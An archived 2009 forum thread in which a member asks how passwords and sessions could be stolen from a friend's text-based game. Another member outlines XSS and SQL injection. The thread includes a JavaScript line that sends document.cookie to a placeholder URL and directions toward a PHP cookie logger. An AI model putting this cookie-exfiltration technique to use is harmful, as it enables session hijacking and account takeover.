PDA

View Full Version : SessionID's, ETC.



Delay
01-28-2009, 02:58 PM
Hello,

Let me first introduce myself, since I'm new to this forum.
My real name is Robin, I'm a 25 year old male and live in the Netherlands (so already excuse me if I'm hard to understand:P)

I'm currently helping my friend, which is working on a textbased game. He asked me to find any ways trying to steal users' passwords, through sessionID's and whatever more is available.

Which possibilities are there to actually 'steal' someones password?
If you need any more information, I'd be pleased to give it to you.

All the best,

Delay

Moonbat
01-28-2009, 06:00 PM
Welcome to the forums :)

To answer your question, there are a few ways.

XSS (Cross-Site Scripting) consists of running maliciious JavaScript on other user's PC. You can use XSS to run a script on a user that will steal their cookie(s) that they have for your website. The attacker can use the cookies and hijack the user's session and take control of his account. Read more on XSS here:

http://en.wikipedia.org/wiki/Cross-site_scripting

Another technqiue, SQL Injection, consists of exploiting a poorly-filtered query to a database. If proper data-sanitation techniques aren't used on an application or application component that interacts with your database, the attacker can inject extra SQL into the query and run it. For example, if you have a search box that processes the user's input and queries a database to get results, an attacker could run multiple malicious SQL queries from that search box, if you don't filter the user input correctly. Read more on SQL Injection here:

http://en.wikipedia.org/wiki/SQL_injection

Those are two common vulnerabilities to look out for.

Delay
01-28-2009, 06:24 PM
Alright, thank you and thank you for the help.

So, as far as I read, XSS makes it able to write down cookies to a webpage, with some little help of javascript.

Hmm, interesting fact.

One more question for today:

How exactly do you (when you've implemented Javacript (document.location='weburlhere' + document.cookie;)) write the requested cookie (and ofc session) to some other place?


Regards,

Delay

Moonbat
01-28-2009, 08:02 PM
How exactly do you (when you've implemented Javacript (document.location='weburlhere' + document.cookie;)) write the requested cookie (and ofc session) to some other place?
You will have to use PHP to do that. You can find existing code for a cookie logger at this link (http://www.xssed.com/article/6/Paper_Kr*ws_Cross-Site_Scripting_Tutorial/#PART%20VI).

But if you want to write your own PHP cookie logger, you'll have to learn PHP. You can check out the W*Schools PHP Tutorial (http://www.w*schools.com/PHP/DEfaULT.asP), which is a great PHP tutorial site.

But if you already are familiar with PHP programming, just do some reading on file functions like fopen() (http://us2.php.net/manual/en/function.fopen.php) and fwrite() (http://us2.php.net/manual/en/function.fwrite.php)